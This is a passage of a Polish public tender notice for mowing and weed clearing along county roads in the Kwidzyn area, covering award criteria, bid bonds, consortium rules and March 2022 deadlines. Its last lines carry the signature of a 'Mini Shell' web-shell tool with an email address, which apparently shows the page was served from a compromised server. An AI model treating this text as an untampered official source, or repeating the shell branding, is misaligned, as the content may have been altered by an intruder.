gruntu.<br/>Przygotowanie terenu do koszenia można rozpocząć po podpisaniu umowy<br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ 3.Zamawiający<br/>dopuszcza przy realizacji zamówienia zastosowanie urządzeń i materiałów równoważnych co do jakości i surowców użytych do ich wykonania do materiałów i urządzeń podanych w<br/>dokumentach zamówienia (SWZ wraz z załącznikami).<br/>4.Jeśli w dokumentach zamówienia (SWZ wraz z załącznikami) wskazana jest nazwa handlowa<br/>firmy, towaru lub produktu, Zamawiający - w odniesieniu do wskazanych wprost w dokumentacji<br/>przetargowej parametrów, czy danych (technicznych lub jakichkolwiek innych), identyfikujących<br/>pośrednio lub bezpośrednio towar bądź produkt - dopuszcza rozwiązania równoważne zgodne z<br/>danymi technicznymi i parametrami zawartymi w w/w dokumentacji. Jako rozwiązania<br/>równoważne, należy rozumieć rozwiązania charakteryzujące się parametrami nie gorszymi od<br/>wymaganych, a znajdujących się w dokumentacji. 5.Gdziekolwiek w dokumentach zamówienia (SWZ wraz z załącznikami) występują odniesienia<br/>do Polskich Norm, dopuszczalne jest stosowanie odpowiednich norm krajów Unii Europejskiej, w<br/>zakresie przyjętym przez polskie prawodawstwo.<br/>6.Wszędzie tam, gdzie dokumentach zamówienia (SWZ wraz z załącznikami), przy opisie<br/>zastosowanych materiałów lub urządzeń wskazano znaki towarowe, patenty lub pochodzenie<br/>przyjmuje się, że mogą być zastosowane materiały lub urządzenia równoważne. Wskazanie<br/>znaku towarowego, patentu lub pochodzenia ma charakter jedynie przykładowy i użyty jest w<br/>celu określenia standardów jakościowych i klasy, wymaganych w odniesieniu do stosowanych<br/>materiałów lub urządzeń. W przypadku, gdy powoływane normy i przepisy są państwowe lub<br/>odnoszą się do konkretnego kraju lub regionu, mogą być również stosowane inne odpowiednie<br/>normy zapewniające równy lub wyższy poziom wykonania niż powołane normy lub przepisy. Wymagania związane z realizacją zamówienia w zakresie zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (t.j. Dz. U. z 2020 r. poz. 1320 z późn. zm) obejmują następujące rodzaje czynności: <br/><br/>- Oznakowanie odcinka robót.<br/>- Usunięcie konarów, gałęzi, skarp po zakrzaczeniach na wysokości gruntu, kamieni, krzewów.<br/>- Mechaniczne wykaszanie roślinności.<br/>- Koszenie roślinności wykaszarkami ręcznymi.<br/>- Czyszczenia pasa jezdnego z elementów skoszonych roślin.<br/>- Demontaż oznakowania odcinka robót.<br/><br/>Szczegółowe wymagania dotyczące sposobu weryfikacji zatrudnienia tych osób oraz uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we wzorze umowy stanowiącym odpowiednio załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">19 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu wykonania zamówienia dla I Etapu i II Etapu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Oferta musi być zabezpieczona wadium w wysokości 2 450,00 zł (słownie: dwa tysiące<br/>czterysta pięćdziesiąt złotych 00/100) jeżeli oferta została złożona na wszystkie zadania, a w<br/>przypadku złożenia oferty na pojedyncze zadania wadium wynosi:<br/>Część 1: 1800,00<br/>Część 2: 650,00<br/>2.Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2020<br/>r. poz. 299).3.Wadium wniesione w formie pieniężnej należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w PBS w Kwidzynie nr rachunku 38-8300-0009-0013-5294-2000-0050, z<br/>dopiskiem na przelewie: postępowanie o udzielenie zamówienia klasycznego prowadzonego w<br/>trybie podstawowym- wariant I (bez negocjacji) pn. Utrzymanie zieleni w pasach drogowych dróg<br/>powiatowych na terenie powiatu kwidzyńskiego.<br/>4. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia do oferty należy złożyć jej<br/>oryginał w postaci elektronicznej.<br/>5. Z treści gwarancji/ poręczenia musi jednoznacznie wynikać nieodwoływalne i bezwarunkowe,<br/>na każde żądanie zgłoszone przez zamawiającego, zobowiązanie gwaranta/ poręczyciela do<br/>zapłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6<br/>ustawy pzp. Ponadto powinien być wskazany termin obowiązywania gwarancji/ poręczenia,<br/>który nie może być krótszy niż termin związania ofertą.<br/>6.Wadium musi być wniesione przed terminem składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania oferta, z wyjątkiem przypadków, o których mowa niżej (stosownie do<br/>brzmienia przepisu art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy pzp).<br/>7.Przy wnoszeniu wadium Wykonawca powinien powołać się na oznaczenie postępowania.<br/>8. Zasady zwrotu oraz przesłanki zatrzymania wadium zostały określone w przepisie art. 98<br/>ustawy pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia zamawiający<br/>bada, czy nie zachodzą podstawy wykluczenia wobec każdego z tych wykonawców.<br/>2.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie,<br/>wskazane w załączniku nr 4 do SWZ składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>5.Zamawiający żąda wskazania przez wykonawcę, w ofercie, części zamówienia, których<br/>wykonanie zamierza powierzyć podwykonawcom, oraz<br/>podania nazw ewentualnych podwykonawców, jeżeli są już znani (załącznik nr 3 do SWZ).<br/>6.W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców, badanie<br/>braku podstaw do wykluczenia przeprowadzane<br/>będzie w odniesieniu do każdego z wykonawców.<br/>7.W formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>8.Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/>9. Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy.<br/>10. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do<br/>zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też<br/>dla wszystkich partnerów.<br/>11. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>12. W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej<br/>postanowienia dot. oferty Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio.<br/>13.W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia - pełnomocnictwo do reprezentowania<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie<br/>umowę o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania<br/>Wykonawców w postępowaniu albo reprezentowania w postępowaniu i<br/>zawarcia umowy. Pełnomocnictwo musi zostać złożone w formie określonej w rozdziale XVII<br/>SWZ.<br/>14.Pozostałe wymagania znajdują się we wcześniejszych sekcjach niniejszego ogłoszenia,<br/>stosownie do wymaganego zakresu informacji, a<br/>także w postanowieniach SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 10 wzoru umowy stanowiącym załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-02 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-02 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com